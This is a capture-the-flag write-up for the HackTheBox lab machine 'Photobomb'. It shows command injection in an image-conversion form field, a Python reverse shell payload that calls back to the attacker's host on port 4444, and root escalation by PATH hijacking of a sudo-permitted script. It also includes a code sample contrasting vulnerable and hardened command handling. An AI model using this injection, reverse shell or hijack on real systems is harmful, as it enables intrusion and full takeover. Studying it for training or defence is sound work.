HackTheBox Writeup: Photobomb
Enum
nmap 10.10.11.182 -sCV -A -T5
Two open ports, 22 and 80. Let's check out port 80.
Add the domain photobomb.htb to the /etc/hosts file.
This is the site running on port 80:
Let's do web enumeration with feroxbuster:
We find some directories. Check http://photobomb.htb/printer, but we don't have any credentials for this login form :(
Browsing the website, we find a JavaScript file, photobomb.js, with the credentials username pH0t0 and password b0Mb! :)
Go to it, and tada :)
Then go to the login form, fill in the creds, and welcome to the photo gallery panel:
There is a suspicious form with a POST action to download the image.
Intercept it with Burp Suite to get the request:
We send the request, and we get the image downloaded with a png extension.
Hmm. From the Burp request and the HTML code, we know that the source image is a jpg, so I guess there is some internal process that converts the extension from jpg to png.
So we will try to inject into the convert process.
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;ping -c 20 10.10.14.42&dimensions=1000x1500
We test whether there is command injection by making the server ping our machine.
On our machine, open a new tab and start listening for the pings with tcpdump:
tcpdump -nni tun0
And we get the ping requests coming in:
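The injection works because the server builds the convert command from the photo, filetype and dimensions fields as one shell string. Below is an added example (not the box's own handler, which this writeup does not show) of that weak pattern next to a hardened version that allowlists each field and passes an argument list with no shell; the field names come from the request above, while the regexes, allowlist and output path are assumptions.

```python
import re
import subprocess
from pathlib import Path

# Assumed allowlists; the real /printer handler is not shown in the writeup.
ALLOWED_FILETYPES = {"jpg", "png"}
PHOTO_RE = re.compile(r"[A-Za-z0-9_-]+\.jpg")
DIMENSIONS_RE = re.compile(r"\d{1,5}x\d{1,5}")
SOURCE_DIR = Path("source_images")  # directory named in cleanup.sh


def vulnerable_command(photo: str, filetype: str, dimensions: str) -> str:
    """The weak pattern: every field is pasted into one string that is later
    handed to a shell (subprocess.run(cmd, shell=True)). A filetype such as
    'png;ping -c 20 10.10.14.42' ends the convert command at ';' and the shell
    runs whatever follows. Returned as a string here, never executed."""
    return f"convert {SOURCE_DIR}/{photo} -resize {dimensions} /tmp/out.{filetype}"


def safe_convert_argv(photo: str, filetype: str, dimensions: str) -> list:
    """Hardened form: reject anything outside a strict allowlist, then build an
    argv list. With a list and no shell, ';', '&', '|' and quotes are just bytes
    inside one argument and can never start a second command."""
    if not PHOTO_RE.fullmatch(photo):
        raise ValueError(f"rejected photo name: {photo!r}")
    if filetype not in ALLOWED_FILETYPES:
        raise ValueError(f"rejected filetype: {filetype!r}")
    if not DIMENSIONS_RE.fullmatch(dimensions):
        raise ValueError(f"rejected dimensions: {dimensions!r}")
    out = f"/tmp/{Path(photo).stem}_{dimensions}.{filetype}"
    return ["convert", str(SOURCE_DIR / photo), "-resize", dimensions, out]


def request_is_safe(photo: str, filetype: str, dimensions: str) -> bool:
    """True if the three form fields would be accepted by safe_convert_argv."""
    try:
        safe_convert_argv(photo, filetype, dimensions)
        return True
    except ValueError:
        return False


def run_convert(photo: str, filetype: str, dimensions: str) -> None:
    # Argument list, never shell=True; convert only ever sees validated values.
    subprocess.run(safe_convert_argv(photo, filetype, dimensions), check=True)
```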
So we replace the ping with our reverse shell code:
export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
Finally, the Burp request will look like this:
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=1000x1500
We open nc to listen on our machine:
nc -lvnp 4444
We send the request in Burp, and we get a shell:
Foothold
Check the id:
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
Check the sudo permissions:
wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
Take a look at cleanup.sh:
cat /opt/cleanup.sh
Output:
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Well, there is a find command without an absolute path, and the sudo rule grants SETENV, so we can supply our own PATH when running the script as root.
Privilege Escalation
Here are the steps to get root.
Move to /tmp and create a fake find:
cd /tmp
touch find
echo "/bin/bash -p" > find
chmod +x find
Run /opt/cleanup.sh with PATH set so that our find in /tmp is found first:
sudo PATH=/tmp:$PATH /opt/cleanup.sh
Output:
wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb#